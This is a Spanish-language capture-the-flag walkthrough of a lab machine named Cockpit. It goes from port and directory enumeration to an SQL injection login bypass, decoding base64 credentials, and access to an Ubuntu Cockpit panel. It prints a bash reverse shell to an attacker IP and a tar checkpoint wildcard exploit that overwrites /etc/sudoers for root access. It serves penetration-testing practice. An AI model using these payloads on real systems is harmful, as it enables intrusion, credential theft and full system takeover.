MAQUINA COCKPIT (Gobuster extension php + Blaze CMS 'SQLI BYPASS LOGIN' + UBUNTU WEB + REVERSHELL +

Enumere las puertos con abiertos con nmap

A estos puertos abiertos les ejecute una serie de script básicos de reconocimiento para ver los servicios que corren y sus versiones.

Use whatweb para identificar las tecnologías que corren en los servidores web (80 y 9090)

En el servidor web del puerto 9090 encontré un panel de sesión de ubuntu, la cual requiere credenciales.

En el servidor web del puerto 80 me encontré con una web estática.

Use unos script de nmap para identificar algo mas interesante.

nmap -p80,9090 --script='http-*' --min-rate 3000 cockpit

Terminado el escaneo observe que posiblemente esta corriendo en php la pagina web del puerto 80.

Use gobuster para encontrar directorios ocultos, a este escaneo le agregue extensiones php,html,txt.

Finalizado el escaneo de directorios, la herramienta encontró un directorio llamado login.php.

Como no tengo credenciales intente realizar una sqlijection, una vez enviado me devuelve el siguiente error.

Luego de buscar en google alguna bypass de autenticación, utilice el siguiente:

'OR "='

Finalmente funciono y logre el acceso al servidor web donde encontré credenciales las cual las contraseñas se encontraban hasheadas.

Con esta herramienta logre identificar los hashes: https://hashes.com/es/tools/hash_identifier

Como me indica, están encondeadas en base64 por lo que paso a decodificarlas con el parámetro "base64 -d" logrando obtener las credenciales en texto plano.

Seguido volví al panel de sesión del servidor web que corre por el puerto 9090.. Una vez allí probé las credenciales de los 2 usuarios.

En este caso me centre en el usuario james.

Ya dentro, luego de realizar un reconocimiento encorte una terminal donde puedo ejecutar comandos como el usuario james.

Aproveche esto y realice una revershell para conectarme desde esta maquina a mi maquina atacante.

bash -i >& /dev/tcp/192.168.45.159/80 0>&1

Busque la forma de escalar privilegios, para ellos ejecute el comando sudo -l y vi que puedo ejecutar el binario "tar".

Para explotar este binario se requiere 3 archivos:

INFO: https://medium.com/@polygonben/linux-privilege-escalation-wildcards-with-tar- f79ab9e407fa

# 1. Create files in the current directory called

# '--checkpoint=1' and '--checkpoint-action=exec=sh privesc.sh'

echo "" > '--checkpoint=1'

echo "" > '--checkpoint-action=exec=sh privesc.sh'

# 2. Create a privesc.sh bash script, that allows for privilege escalation

#malicous.sh:

echo 'kali ALL=(root) NOPASSWD: ALL' > /etc/sudoers

#The above injects an entry into the /etc/sudoers file that allows the 'kali'

#user to use sudo without a password for all commands

#NOTE: we could have also used a reverse shell, this would work the same!

#OR: Even more creative, you could've used chmod to changes the permissions #on a binary to have SUID permissions, and PE that way

touch ./--checkpoint=1

touch ./--checkpoint-action=exec=sh privesc.sh

chmod +x privesc.sh

Por ultimo ejecuto el binario.

Luego de unos segundos ejecute el comandos script y observe que logre logearme como usuario root.